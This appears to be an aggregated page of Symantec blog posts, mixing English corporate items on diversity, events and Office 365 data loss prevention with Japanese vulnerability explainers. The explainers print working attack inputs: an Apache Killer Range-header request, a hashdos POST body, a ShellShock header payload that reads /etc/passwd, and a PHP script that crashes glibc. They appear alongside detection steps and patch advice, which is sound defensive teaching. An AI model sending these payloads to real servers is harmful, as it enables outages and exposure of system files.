Quantcast
Channel: Symantec Connect - ブログエントリ
Viewing all 5094 articles
Browse latest View live

Giving and Receiving: Where Philanthropy and Corporate Value Intersect

0
0
Conference Board, Giving Thoughts Series

This blog was orginially posted on the Conference Board, Giving Thoughts Series May 24, 2016.

Symantec’s vision is to make the world a safer place, and to accomplish this we need a team with the diversity of expertise and experience to protect against threats, both known and unknown. I believe that diversity helps us understand our customers better, enables us to respond to trends more quickly, and stimulates innovation. This is why we’ve made investing in diversity—both internally and more broadly in society through our philanthropic partnerships—a priority at Symantec, not just because it’s the right thing to do, but because it directly translates to a higher performing industry, company and bottom line.

According to Gallup, organizations with inclusive cultures report 27 percent higher profitability than those without.  And McKinsey’s recent Diversity Matters report found that ethnically and gender-diverse teams offer companies more problem-solving tools, broader thinking, and better solutions, sparking innovation across the company.

The intersection of philanthropy and diversity efforts

A diverse workforce is rooted in a consistent, growing pipeline of qualified candidates. However, this doesn’t happen overnight and it most certainly doesn’t happen solely within the confines of our business. We need to reach outside our walls and into the communities where we live and work, to drive change that will not only benefit Symantec, but the industry and society as a whole.

This is where philanthropy becomes a crucial piece of the puzzle. I have always felt strongly that our philanthropic investments can be a powerful tool for translating a diversity strategy into tangible results. Targeted, strategic philanthropy should align with and support our business. When aligned with diversity goals and metrics, philanthropy allows us to build relationships with key influencers and leading nonprofit organizations that are at the forefront of championing equity. We learn from these partnerships—where the gaps are, how we can more effectively reach diverse communities, what we can be doing within our own company to build a culture that’s more diverse and inclusive.

This intersection of philanthropy and diversity supports our diversity strategy, which is focused on attracting and retaining diverse talent, building an inclusive culture where that talent can thrive, and engaging with stakeholders to drive social impact—such as gender equity and equal access to STEM/cybersecurity education.

We believe in leveraging our philanthropic dollars to partner with thought leaders in the areas of diversity.  We are a founding signatory  of the Women’s Empowerment Principles (WEP), a partnership initiative of UN Women and UN Global Compact (UNGC) considered globally as the recognized principles and standards for women’s equality. In 2012, our CEO endorsed the WEP, and since then we’ve made strides towards implementing the principles and promoting equality for women. We grew our representation of women on our Board of Directors from 10 percent to 30 percent. We now have 30 percent female representation on our C-Suite as well.  We also set public-facing goals to increase the percentage of women in our leadership. The WEP has provided us a framework to more fully integrate gender equity into and across our business

We also help to advance public policy initiatives which support equity and human rights.  While we have been recognized by the Human Rights Campaign (HRC) as a “Best Place to Work for LGBT Equality” for eight consecutive years, it’s really our partnership with the HRC which has guided us on creating a more inclusive culture and becoming public advocates ofLGBT equality, supporting such relevant initiatives as The Equality Act and most recently signing onto HRC’s letter against North Carolina’s recent law impacting the LGBT community. Additionally we partner with nonprofits that promote the inclusion of more women into the technology field such as the Anita Borg Institute, and Lesbians Who Tech, an organization which celebrates the most innovative technology coming out of the lesbian community.

REAL Program

Net Impact is a nonprofit which mobilizes new generations to use their skills and careers to drive transformational social and environmental change. (As a side note, I would like to say that if I had the opportunity to belong to Net Impact when I was in college or graduate school I would have discovered much earlier in my career the importance of a career with purpose.)

We have partnered with Net Impact on the creation of the Racial Equity Awareness Leadership (REAL) Program. This scalable effort on race equity has a goal to institutionalize racial equity at colleges and universities through training and curriculum, and also create an inspired and equipped cohort of REAL student leaders to serve as peer-to-peer racial equity champions. Symantec has also provided a grant to Net Impact to further the growth of their chapters at undergraduate colleges and universities, with a focus on Historically Black Colleges and Universities (HBCUs), supporting the case for the crucial role that the HBCU community can play in addressing the racial inequities and barriers still in existence in the business world today.

Symantec Cyber Career Connection

A final great example of how philanthropy and diversity can come together to create shared value—and one that I am especially proud of—is our signature program, Symantec Cyber Career Connection (SC3). This initiative in collaboration with Symantec, the Symantec Foundation, nonprofit partners, and global companies is focused on building a pipeline of more diverse talent.  SC3 addresses the global shortage of cybersecurity professionals and the lack of diversity in the cybersecurity profession by providing underrepresented young adults and veterans the preparation and training they need to enter into cybersecurity careers.

In its first year, SC3 moved graduates into internships and full-time jobs at companies including Symantec, KPMG, Bank of America and Morgan Stanley, as well as improving diversity in the cybersecurity field, with 96 percent of graduates from the program being people of color and 38 percent female.

These are just a few of the ways I believe philanthropy and diversity have collaborated to produce important outcomes for Symantec and society. My hope is that the ongoing integration of our corporate diversity and philanthropic strategies will continue to strengthen our position in the marketplace and increase our impact externally more effectively than either can achieve alone.

More about the intersection of corporate philanthropy and diversity and inclusion

This post responds to The Conference Board’s recent report Better Together: Why a United Front Can Propel Diversity and Inclusion and Corporate Philanthropy in the United States.The report is available free to members of The Conference Board.

About the author:

Cecily Joseph Vice President of Corporate Responsibility and Chief Diversity Officer Symantec Corporation

Cecily Joseph
Vice President of Corporate Responsibility and Chief Diversity Officer Symantec Corporation

Cecily Joseph is vice president of corporate responsibility and chief diversity officer for Symantec Corporation, a global leader in cybersecurity. As leader of Symantec’s corporate responsibility efforts, Cecily drives environmental, social and governance program development and integration. As Chief Diversity Officer, she is an ongoing champion for diversity & inclusion, pioneering numerous initiatives to increase diversity and equity within Symantec and the technology sector.


意図しないファイル公開とディレクトリインデックシング(CWE-425、CWE-548)の解説

0
0
意図しないファイル公開とディレクトリインデックシング(CWE-425、CWE-548)

このブログではウェブサイトやその上で動作しているウェブアプリケーションの脆弱性について紹介すると共に注意喚起をする目的でまとめられています。

今回は、古くから現在まで発生し続けている「ディレクトリインデックシング」に起因する情報漏洩について解説をしています。

※なお、内容に関しましてはHASHコンサルティング株式会社の徳丸 浩様に監修いただいています。

+++++++++++++++++++++++++++++++++++++++++++++++

意図しないファイル公開とディレクトリインデックシング(CWE-425、CWE-548)

■概要

 ディレクトリインデックシング(ディレクトリリスティング)はWebサーバーの標準的な機能の一つであり、URLのパスとしてディレクトリを指定した場合に、そのディレクトリに含まれるファイル名を表示する機能です。例えば、ソフトウェアのダウンロードを目的とするサイトでは、ファイル一覧をHTMLとして作成しなくても、ディレクトリインデックシングを使用すると、自動的にファイル名の一覧が表示され、ダウンロードもできるため便利です。

 しかし、うっかりWebサーバーの公開領域に秘密情報を含むファイルが置かれている場合、ディレクトリインデックシングにより、そのファイル名が外部から判明することにより、秘密情報が漏洩する原因になります。

■攻撃のイメージと影響

 http://example.jp/bbs.php というURLで掲示板ソフトを提供しているサイトがあり、このサイトにはディレクトリインデックシングが有効であるとします。この場合、http://example.jp/ を閲覧すると、以下のような表示となります。

Index of /

  • bbs.db
  • bbs.php
  • data/
  • dbconnect.php

【後略】

ここで、bbs.dbというファイルが表示されていますが、これは掲示板のデータベースファイル(SQLite形式)です。bbs.dbのリンクをクリックするだけでデータベースファイルをダウンロードでき、データベース内の個人情報など秘密情報が簡単に外部に漏洩してしまいます。

■脆弱性による影響

 ディレクトリインデックシング自体は脆弱性ではなく、公開を意図していないファイルを公開領域に配置してしまったことが脆弱性といえます。ディレクトリインデックシングの設定がない場合でも、秘密情報が公開領域にある場合、ファイル名が辞書攻撃などによりわかってしまう場合があります。

また、とある国家資格のウェブサイトにおいて、解答のPDFファイルを試験前にダウンロードされてしまった事件も過去に起こっています。原因は、解答のPDFファイルをあらかじめWebサーバー上に配置しておき、公開のタイミングでファイルへのリンクを表示する運用をしていたところ、毎年同じルールでファイル名をつけていたために、そのファイル名の規則性を見破られてしまったことが原因でした。そもそも非公開とすべきファイルをWebサイト上に配置してしまったことが根本原因と言えます。

上記脆弱性の影響には以下があります。

  • 重要情報の漏洩

■脆弱性の有無の確認方法

 脆弱性の確認には以下を実施する必要があります。

  • ウェブ公開領域に秘密情報のファイルがないこと
  • ディレクトリインデックシングが無効になっていること(意図的な場合を除く)

また、外部からディレクトリインデックシングの有無を診断する方法が、「安全なウェブサイトの作り方」別冊の「ウェブ健康診断仕様」に記載されています。

■対策

 対策としては以下を実施します。

  • ウェブ公開領域に秘密情報のファイルが配置しないこと
  • ディレクトリインデックシングを無効にする

Apacheでディレクトリインデックシングを無効にするには、httpd.conf等に以下(-Indexes)を設定します。

<Directory "/var/www/html">

    Options -Indexes

</Directory>

■参考文献

ウェブ健康診断仕様(安全なウェブサイトの作り方別冊)

https://www.ipa.go.jp/security/vuln/websecurity.html

ミドルウェアの不具合に起因するサービス妨害攻撃の説明

0
0
ミドルウェアの不具合に起因するサービス妨害攻撃

このブログではウェブサイトやその上で動作しているウェブアプリケーションの脆弱性について紹介すると共に注意喚起をする目的でまとめられています。

今回は、ミドルウェアのバグに基づくサービス妨害攻撃(Denial of Service; DOS)を受けやすい脆弱性について解説をしています。

※なお、内容に関しましてはHASHコンサルティング株式会社の徳丸 浩様に監修いただいています。

+++++++++++++++++++++++++++++++++++++++++++++++

ミドルウェアの不具合に起因するサービス妨害攻撃

■概要

サービス妨害(DoS)攻撃という手法があります。細工を施したリクエストや大量のリクエストをサーバに送信することにより、サーバの動作を遅くしたり、場合によってはサーバーを停止させる攻撃のことです。DoS攻撃では情報の漏洩やデータの改ざんは通常起こりませんが、サーバ停止の状況によっては、ファイルの一部が破損する場合はあり得ます。

DoS攻撃としてよく用いられる手法にはネットワークの問題を悪用したものが多いのですが、それ以外にミドルウェアやアプリケーションの不具合を悪用する方法もあります。その一例として、Apacheの不具合を悪用したApache Killer(CVE-2011-3192)やPHPやJava等の言語システムの不具合を悪用したhashdos(CVE-2011-4885等)があります。

■攻撃のイメージと影響

 以下はApache Killerの送信するHTTPリクエストです。一部を割愛しています。Rangeヘッダに攻撃の特徴があります。

GET / HTTP/1.1

Host: example.jp

Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32, 【中略】 5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299

上記リクエストを脆弱性のあるApacheが受け取ると、CPU使用量、メモリ使用量の両方が肥大化し、メモリ不足とCPU能力の枯渇がおきます。特に、メモリ不足により、Linux OSにおいてはOOM Killerという仕組みが動き、メモリ使用量の多いプロセスを停止していきます。OOM Killerはプロセスの重要度を考慮しないので、データベースサーバ等サービス提供に不可欠なプロセスまで停止させられ、ウェブサーバーは機能停止に陥ってしまいます。

以下はPHPに対するhashdos攻撃のリクエスト例です。

POST /phpinfo.php HTTP/1.1

Host: example.jp

Content-Type: application/x-www-form-urlencoded

Content-Length: 1441792

EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&EzEzEzEzEzEzFYEz=&EzEzEzEzEzEzFYFY=&EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=&EzEzEzEzEzEzG8Ez=&EzEzEzEzEzEzG8FY=&EzEzEzEzEzEzG8G8=&EzEzEzEzEzEzG8H%17=&EzEzEzEzEzEzH%17Ez=& 【後略】

 このリクエストをPHPが受け付けると、パラメータを内部の連想配列(ハッシュと呼ばれます)に格納する処理に異常に時間がかかり、その間新規リクエストを受けつられなくなります。ただし、Apache Killerと異なりメモリが枯渇するわけではないので、攻撃が終了すると直ちにサーバは回復します。

■脆弱性による影響

 DoS攻撃による影響の例としては以下があります。

  • サーバー速度の遅延
  • 新規リクエスト受付の停止
  • サーバーの異常終了

■脆弱性の有無の確認方法

シマンテックのSSLサーバ証明書に無償で提供される「脆弱性アセスメント」には、Apache Killerおよびhashdos脆弱性検出の機能が提供されています。

 上記のような脆弱性スキャナ、脆弱性診断サービスが利用できない場合は、ApacheやPHP等のバージョンが対策済みかを確認して下さい。

Apache Killer の影響を受けるバージョン 2.2.0 ~ 2.2.20

Hashdosの影響を受けるもの

ASP.NET  MS11-100 未適用のもの

Tomcat   5.5.34およびそれ以前、6.0.34およびそれ以前、7.0.22およびそれ以前

Ruby     1.8.7-p352およびそれ以前

PHP    5.3.8およびそれ以前

■対策

 対象ソフトウェアの対策バージョンへのバージョンアップあるいはパッチ適用を行います。

 Apache Killerおよびhashdosには、それぞれ緩和策があります。なんらかの理由でパッチ適用等ができない場合、緩和策を実施することで、攻撃を受けた場合の被害を軽減できます詳しくは参考文献を参照ください。

なお、「シマンテック クラウド型WAF」では、Apache Killerやhashdos等の脆弱性からウェブサイトが攻撃を受けるのを防ぐことができます。

■参考文献

独立行政法人情報処理推進機構(IPA)の注意喚起

https://www.ipa.go.jp/security/ciadr/vul/20110831-apache.html

https://www.ipa.go.jp/security/ciadr/vul/20120106-web.html

Apache公式サイトのアドバイザリ(英語)

http://httpd.apache.org/security/CVE-2011-3192.txt

POODLE (Padding Oracle On Downgraded Legacy Encryption; CVE-2014-3566)の解説

0
0
POODLE (Padding Oracle On Downgraded Legacy Encryption; CVE-2014-3566)

このブログではウェブサイトやその上で動作しているウェブアプリケーションの脆弱性について紹介すると共に注意喚起をする目的でまとめられています。

今回はSSL3.0の脆弱性POODLE (Padding Oracle On Downgraded Legacy Encryption; CVE-2014-3566)について解説をしています。

※なお、内容に関しましてはHASHコンサルティング株式会社の徳丸 浩様に監修いただいています。

+++++++++++++++++++++++++++++++++++++++++++++++

POODLE (Padding Oracle On Downgraded Legacy Encryption; CVE-2014-3566)

■概要

インターネット上の通信暗号のプロトコルとして、従来からSSL(Secure Sockets Layer)が広く使われています。このSSLの一番新しいバージョン3.0を効率的に解読する方法が今年の10月に米Google社のセキュリティチームにより公表され、POODLE(Padding Oracle On Downgraded Legacy Encryption)と命名されました。POODLEを用いるとSSL3.0上のHTTPS通信の一部が解読される可能性があります。

■攻撃のイメージと影響

SSL3.0による暗号化では、CBC方式のブロック暗号を選択することができ、その場合には一定の長さのブロックという単位で暗号化が行われます。対象のデータサイズはブロック長の倍数とは限らないため、ブロックの余白の部分にはパディングというダミーのデータを配置します。SSL3.0のパディングについては厳密なチェックが仕様として要求されていないため、パディングを巧妙に操作することにより、1回の通信で1/256の確率で1バイトのデータが復号できます。これを繰り返すことにより、数十バイトのデータを得ることができます。クッキーやBASIC認証のパスワードが攻撃の対象になります。

 POODLE攻撃を行う前提として、利用者の端末からの通信を外部から操作できることが必要となります。そのような性質を持つプロトコルとしてHTTPがあります。一方、HTTP以外のメールやデータベースのプロトコルではPOODLEの影響は受けません。

■脆弱性による影響

 この脆弱性による影響として、通信の一部が第三者に漏えいする可能性があります。典型的な影響の例としては、クッキーの漏洩によるなりすましや、BASIC認証のIDとパスワードが漏洩して不正ログインなどが考えられます。

 攻撃の性質上、HTTP以外のメール等の暗号を解読することはできません。また、クッキーやHTTP認証(BASIC認証やDIGEST認証)を使用していないサイトは影響を受けにくいと考えられます。

■脆弱性の有無の確認方法

 WebサーバーのPOODLE脆弱性を検証する方法として、SSL3.0が有効になっているかどうかで判定することができます。例えば、Windowsのインターネットオプションの「詳細設定」タブで「SSL3.0を使用する」を有効に、その他のSSLおよびTLSを有効にしない設定にして、対象サイトをInternet Explorer(IE)でHTTPSアクセスします。正常にアクセスできた場合は、SSL3.0が有効ですので、POODLE脆弱性があることになります。

チェックの後は必ずインターネットオプションを元に戻しておいてください。

■対策

 POODLE脆弱性はプログラムのバグではなくプロトコル自体の脆弱性であるため、パッチ適用等では根本的に修正することはできません。POODLEの影響を受けるウェブサイトの場合、SSL3.0を無効にしTLSのみを有効にすることで、POODLE脆弱性を受けなくなります。

なお、「シマンテック クラウド型WAF」では、POODLE脆弱性によりウェブサイトが攻撃を受けるのを防ぐことができます。

■参考文献

更新:SSL 3.0 の脆弱性対策について(CVE-2014-3566)

JVNDB-2014-004670 OpenSSL およびその他の製品で使用される SSL プロトコルにおける平文データを取得される脆弱性

http://jvndb.jvn.jp/ja/contents/2014/JVNDB-2014-004670.html

JVNVU#98283300 SSLv3 プロトコルに暗号化データを解読される脆弱性(POODLE 攻撃)

https://jvn.jp/vu/JVNVU98283300/index.html

ShellShock(CVE-2014-6271)の解説

0
0
ShellShock(CVE-2014-6271)

このブログではウェブサイトやその上で動作しているウェブアプリケーションの脆弱性について紹介すると共に注意喚起をする目的でまとめられています。

今回は2014年9月に公表されたGNU Bashの脆弱性について解説しています。この脆弱性はShellShockと呼ばれます。

※なお、内容に関しましてはHASHコンサルティング株式会社の徳丸 浩様に監修いただいています。

+++++++++++++++++++++++++++++++++++++++++++++++

ShellShock(CVE-2014-6271)

■概要

UnixやLinux等のOSでは、ユーザーからのコマンドを解釈実行するプログラムとしてシェルが用いられます。シェルの中でもLinuxやMac OS X等に標準で採用され、もっとも広く用いられているものにBashがあります。

他のシェル同様Bashにはプログラミングの機能があり、関数を環境変数により外部から指定することができます。この機能に脆弱性があり、環境変数経由で、外部から指定された任意のプログラムを実行できてしまいます。

 Bashに対して外部から環境変数を指定する方法の典型例はCGIプログラムによるものですが、これ以外にメール受信など複数の方法が指摘されており、9月以降現在まで、攻撃が活発に継続されています。

■攻撃のイメージと影響

 Perl言語により記述されたCGIプログラムがあり、以下の部分によりメール送信をしているとします。以下のプログラムは外部からのパラメータ指定などはなく、一見すると攻撃の余地はありません。

system('/usr/sbin/sendmail admin@example.jp< mail.txt'); 

 しかし、このCGIプログラムを起動する際に、ブラウザのUser-Agentを以下のように指定することで攻撃ができてしまいます。

() { :;}; /bin/cat /etc/passwd

 CGIプログラムに対しては、User-AgentなどHTTPヘッダは環境変数経由で渡されます。そして、CGIプログラムからsendmailコマンドを起動する際に、system関数の実装上シェルが起動されます。このため、デフォルトシェルとしてbashが指定されている環境では、上記のアクセスの結果 /etc/passwdの内容が表示されます。

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

【以下略】

■脆弱性による影響

 この脆弱性による影響の例として下記がありますが、これらに限定されるわけではありません。

  • 秘密情報の漏洩
  • データの改ざん
  • 他サイトへの攻撃の踏み台

■脆弱性の有無の確認方法

 Bashのプロンプトから以下を実行してください。

$ env x='() { :;}; echo this bash is vulnerable' bash -c :

 下記が表示された場合、ShellShock脆弱性があることになります。

this bash is vulnerable

■対策

 Bashの最新版を導入するか、Bashの最新のパッチを適用することで対処できます。ShellShock対応の初期のパッチは対策が不十分という指摘があるため、必ず最新のパッチを全て適用するようにしてください。

なお、「シマンテック クラウド型WAF」では、ShellShock攻撃からウェブサイトが攻撃を受けるのを防ぐことができます。

■参考文献

JVNVU#97219505

GNU Bash に OS コマンドインジェクションの脆弱性

http://jvn.jp/vu/JVNVU97219505/index.html

GHOST脆弱性(CVE-2015-0235)の解説

0
0
GHOST脆弱性(CVE-2015-0235)

このブログではウェブサイトやその上で動作しているウェブアプリケーションの脆弱性について紹介すると共に注意喚起をする目的でまとめられています。

今回は、Linux等で使用されているC言語向けライブラリglibcの脆弱性であるGHOST(CVE-2015-0235)について解説をしています。

※なお、内容に関しましてはHASHコンサルティング株式会社の徳丸 浩様に監修いただいています。

+++++++++++++++++++++++++++++++++++++++++++++++

GHOST脆弱性(CVE-2015-0235)

■概要

Linux OSの内部で使用されているライブラリglibc(GNU C ライブラリ)にgethostbynameという関数があり、ホスト名からIPアドレスを求める目的で利用されています。このgethostbyname関数には、処理に必要なメモリのバイト数計算に誤りがあり、バッファオーバーフロー攻撃が可能となることが2015年1月に発見されました。この脆弱性はGHOSTと呼ばれます。

gethostbyname関数を利用しているソフトウェアのうち、メール配信サーバーEximでは実際に任意コード実行が可能であることが実証され、その他のソフトウェアでも影響があるものが報告されています。

■攻撃のイメージと影響

 以下のPHPスクリプトをコンソールにて実行します。

<?php

    gethostbyname(str_repeat('0', 1027));

    gethostbyname(str_repeat('0', 1028));

str_repeat関数は、文字列を指定の数字だけ繰り返す関数です。このためgethostbyname関数の引数は、それぞれ 0 を1027個並べたものと、0を1028個並べたものになります。このスクリプトの実行結果は以下のとおりです。

$ php gethostbyename-vul.php

*** glibc detected *** php: realloc(): invalid next size: 0x08b0b118 ***

======= Backtrace: =========

/lib/libc.so.6[0x92de31]

/lib/libc.so.6[0x9330d1]

/lib/libc.so.6(realloc+0xdc)[0x93326c]

【後略】

 不正なメモリ操作が検知され、PHPが異常終了していることがわかります。

以上はPHPでの脆弱性の例ですが、メール配信サーバーEximを使っている場合、インターネット経由の攻撃により、任意のコードが実行できることが確認されています。

■脆弱性による影響

 Eximを使っている場合、外部から任意コードが実行され、結果として以下の影響を受ける可能性があります。

  • サーバー内のファイルの閲覧、書き換え、削除
  • 不正なシステム操作(ユーザアカウントの追加、変更、その他)
  • 不正なプログラムのダウンロード、実行
  • 他のサーバーへの攻撃(踏み台)

 Exim以外では任意コード実行が検証されてはいませんが、前述のPHPの例のようにソフトウェアがクラッシュ(異常終了)したり、最悪ケースでは任意コードが実行されてしまう可能性があります。

■脆弱性の有無の確認方法

 この脆弱性の発見者であるQualys社が脆弱性判定用のプログラム(C言語ソース)を公表しています。

https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt

$ gcc GHOST.c         コンパイル

$ ./a.out                    実行

Vulnerable               Vulnerableと表示されたら脆弱

$

■対策

 各Linuxディストリビューションから対策パッチが提供されていますので、該当するパッチを適用してください。

■参考文献

Qualys社のアドバイザリ(英文)

https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt

独立行政法人情報処理推進機構(IPA)の注意喚起

https://www.ipa.go.jp/security/announce/20150129-glibc.html

黑客盗用推特账户发布成人交友和黄色网站链接

乗っ取られた Twitter アカウントが、アダルト出会い系サイトやセフレ紹介サイトへのリンクをツイート

0
0
2,500 を超える Twitter アカウントが乗っ取られ、アダルト出会い系サイトやセフレ紹介サイトへのリンクをツイートしています。

続きを読む

Android threats evolve to handle Marshmallow’s new permission model

0
0
Android.Bankosy and Android.Cepsohord are capable of working with the new runtime permission model introduced in Android 6.0 Marshmallow.

続きを読む

SWIFT attackers’ malware linked to more financial attacks

0
0
Bank in Philippines was also targeted by attackers, whose malware shares code with tools used by Lazarus group.

続きを読む

Symantec Receives Awards for Leadership in Diversity

0
0
Scott Taylor Named to UPstanding Top 100 Executive Power List

Today, we profile two recent awards Symantec has received as a leading advocate in promoting diversity across our business, community and industry. 

Leadership California Corporate Leader Award

Symantec has been awarded the Corporate Leader Award by Leadership California, highlighting our "exemplary leadership in the inclusion of women in executive and board of director positions."

Leadership California is a network of accomplished women, dedicated to advancing the leadership role women play in impacting business, social issues and public policy. Through Leadership California's Issues and Trends Program, Symantec has strengthened the business acumen of senior female executives by training them on the key drivers of business in their region. Symantec's Vice President, Corporate Responsibility & Chief Diversity Officer Cecily Joseph completed the CIT program in 2008 and now serves as the Vice President of Leadership California's board. Additionally, the partnership has provided valuable networking for Symantec employees.

On May 2nd Sheila Jordan, Symantec's Chief Information Officer, accepted the award at Leadership California's annual awards event, attended by nearly 300 female leaders across government, academia and the non-profit sector. The event celebrated achievements of female leaders that have impacted their communities and governments, and have demonstrated groundbreaking achievements.

LA1.png

Symantec's Sheila Jordan accepts the company's Corporate Leader Award from Leadership California for leadership in promoting diversity.

In an interview with Leadership California, Sheila shared how Symantec embeds diversity into core business and philanthropic efforts:

Diversity came up when I interviewed for my job at Symantec, so it’s clearly part of Symantec’s culture. It’s one of the company’s core values, and we focus on diversity in all aspects of the company—it helps us to think differently and to aggressively innovate. Our diverse talent pool helps us innovate at all levels—product development, IT, finance, and marketing.

We’ve systematically worked to get women into leadership roles and have succeeded—that’s exciting. Our board is 30% women which we love. We have our internal Symantec Women’s Action Network (SWAN) that’s been part of the company for years. We have demonstrated how important gender equality is for our company culture and our practices.

Externally, we participate in Leadership California, and also in Anita Borg, a nonprofit organization that encourages recruitment, retention, and advancement of women in technology. We sent over 200 women to the Anita Borg conference last year. We source interns, we sponsor development programs, and we learn from the speakers. Our women are exposed to best practices, make connections, network, and gain tools on career development. We want to make sure we’re developing our women, and that we’ll have a talent pipeline and role models. We also want to stay connected with Leadership California and with STEM activities for young girls.

As one of the company's top executives, Sheila has been central to transforming business performance and is a key advocate for the growth and advancement of our female talent. We couldn’t have been happier to have Sheila accept this recognition on behalf of Symantec.  

Scott Taylor Named to UPstanding Executive Power List  

Scott Taylor, Symantec Executive Vice President and General Counsel, was recently recognized on the UPstanding Executive Power List as a champion for diversity at Symantec and an active advocate for racial equality within his community and industry.

The UPstanding Executive Power List includes the Top 100 Executive Black, Asian, and Minority Ethnic (BAME) professionals working in the US, UK and Ireland. Candidates are analyzed across four categories including: professional and business achievements; contributions to the BAME agenda in their community, industry and company; and seniority/influence within their organization.   

UpStanding.png

Scott is an executive sponsor of Symantec's Black Employee Resource group (SyBER), focused on developing career advancement and mentorship opportunities, recruiting tactics, and community building to attract and retain Black talent.  Most recently, he led SyBER's celebration of Black History Month, partnering with HBCU Connect, the largest organization of Black college alumni, students, and supporters, to host more than 125 Silicon Valley professionals from across Silicon Valley and leading non-profits to discuss ways to increase the talent pool of qualified Black technology workers.

Additionally, he sits on the national advisory board of Stanford’s Center for Comparative Studies on Race and Ethnicity and has encouraged male advocates for female diversity to join him in supporting recent events by Symantec's Women's Action Network (SWAN).

As a member of Symantec's executive team and the leader of the company's corporate responsibility and diversity and inclusion teams, we are extremely proud that Scott has been recognized for his exemplary leadership and actions in promoting an inclusive environment for BAME professionals.

Stay tuned! In the coming weeks, we will discuss the advancement of our ERGs and the central role Scott, Sheila and our ERG global executive sponsors play in leveraging the passions of our employees to contribute to our leadership in diversity.   

Symantec to Share its Security Expertise at Gartner Summit 2016

0
0
Align your security and risk strategies with Symantec at the Gartner Security and Risk Management Summit 2016. Visit Booth #303 for demos and more.

The countdown has well and truly begun to the Gartner Security and Risk Management Summit 2016 in Washington DC (June 13-16 at the National Harbor, MD) – a not-to-be-missed opportunity for senior executives to re-evaluate the levels of exposure to cyber threats that constantly lay siege to their operations.

It is all about enabling organisations to reduce risk and adopt new security models that will build the trust and resilience needed to drive their business forward. Symantec will play a key role in ensuring delegates come away from the summit armed with the expertise they need to take their businesses to the next level of security, whether that be cyber defence, the IoT, securing the digital world, staying ahead of advanced threats or dealing with cloud, SaaS and Office 365.

You need the comprehensive protection from threats that Symantec brings as the leading provider of security solutions. With many enterprises today having layered technology upon technology, the overflow of information into their organisations has become unmanageable. Symantec’s security intelligence, however, filters these messages, reducing white noise and allowing your team to focus on what’s important - moving them from being reactive and used when things go wrong to engaged and proactive; strategic and helping to move business forward.

Ultimately – and inevitably – there will be breaches: where information that looks ‘good’ (i.e., safe) enters the organisation from multiple angles simultaneously. That’s when you need the right technology on the inside to recognise when such attacks are taking place, automatically alerting, blocking and even remediating - keeping business safe from threat.

All of the sessions that Symantec will be delivering at the Gartner Summit– see below – will highlight this ‘How to stay safe’ message:

How to transform your Security Operations to Cyber Defence
Would you know if you were being targeted or breached? To reduce the volume of alerts and data security generates you need to adopt a more holistic approach - connecting technology, understanding risk posture and moving from reactive to proactive.

A New Paradigm for Securing the Digital World
Digital technologies including IoT and cloud create opportunity and risk. Companies should look to cloud as foundational for security solutions; providing improved threat intelligence, rapid detection and quick remediation.

IoT: Taking back control from chaos
How can the CISO and CIO ensure corporate IOT has security is built-in? How do they manage risk from employee owned IOT? This session will sketch strategies for ensuring that security for IoT is considered at all levels.

Staying ahead of advanced threats: Best Practice from the Trenches
Together with our customer we’ll explain exactly how Symantec Advanced Threat Protection is keeping its business safe today and its innovative plans for being safer in the future.

Moving to Office 365 increases productivity, but what about security?
You need confidence in security applied to all cloud services. Don’t ask: “How should I protect Office 365?”. Rephrase the question to: “How do I protect information from threats and loss, wherever it resides?”

Ultimately, Symantec’s presence at the Gartner Summit is all about enabling senior delegates to gain the insights they require to align their security & risk strategies with enterprise objectives and to apply the latest techniques to tackle risk, wherever that may surface.

Visit us at Booth #303 to learn about the new Symantec, experience a demo of our latest solutions and talk to our specialists. We look forward to seeing you in June!

Extending the Security of Office 365: Symantec Data Loss Prevention

0
0
How Symantec can bring higher levels of protection, control and visibility

While your organization has turned to Office 365 for productivity with the cloud, is your data safe and secure? According to an IDC white paper sponsored by Symantec, organizations should focus their efforts on the main areas of authentication and access control, data loss prevention, email security, and advanced threat protection to improve upon Office 365's integrated security features.

In previous posts of this series, we examined how Symantec Office 365 Protection helps fill in the security gaps that Office 365 misses; and in particular, email and advanced threat protection. In this installment, we’ll have a close look at how Symantec Data Loss Prevention (DLP) can provide an extra layer of security for organizations using Office 365.

The need for Data Loss Prevention

While Microsoft Office 365 has some basic built-in security, enterprises should consider augmenting and extending the security.

Does your organization have a solid data loss prevention solution?

Organizations using the cloud need data loss prevention technology to locate, monitor, and protect their data―so that they know who is doing what, with what data, in real time. Data loss prevention can block certain types of sensitive data from leaving an organization.

While Office 365 has built-in data loss prevention and encryption capabilities, it doesn’t meet the advanced compliance and complex intellectual property use cases and requirements of enterprises.

Challenges faced with Office 365’s basic built-in data loss prevention:

  • Limited content detection methods (simple regex, some document fingerprinting, and basic watermarking) can lead to a high number of false positives
  • False positive can increase burden on IT
  • Incident remediation and workflow options are limited to basic notification and blocking

Overall, these obstacles make it difficult for enterprises to respond effectively to data loss incidents.

How Symantec Data Loss Prevention Extends Office 365

Symantec for Office 365 is designed as a comprehensive security solution that seamlessly integrates with Office 365 for greater protection of your valuable information while detecting and remediating increasingly sophisticated threats.

Symantec delivers enterprise-strength data protection.

Symantec DLP Cloud Service for Email is a new cloud-based service built on Symantec’s market-leading data loss prevention technology. It offers the broadest content detection capabilities, including described content matching (keywords, expressions), data fingerprinting (structured data and unstructured documents), and machine learning (for content such as source code and forms). These advanced detection technologies are coupled with support for over 360 different file types. It offers sophisticated policy management, reporting, and incident remediation workflows.

Use a single unified set of DLP controls for all cloud and on-premises environments.

Unlike Microsoft’s multiple management interfaces and disjointed controls, Symantec’s solution provides robust and unified security controls for heterogeneous environments and hybrid deployment models. This allows you to extend your security infrastructure and policies to Exchange Online and a range of non-Microsoft applications & mobile devices environments. The Symantec Enforce management platform provides a unified, easy-to-use management console across all DLP channels, including Office 365 Exchange, and other cloud apps and on-premises deployments.

